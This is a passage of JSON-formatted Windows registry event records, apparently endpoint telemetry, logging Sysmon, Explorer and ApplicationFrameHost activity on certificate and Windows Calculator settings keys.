"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573247920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", - "registry_value": "SplashScreen", - "timestamp": 131883573248080000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248230000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573248230000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", - "registry_value": "PreferredMinSize", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573248390000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": 
"ButtonPressedBackgroundColor", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573248540000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - 
"timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573248700016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": 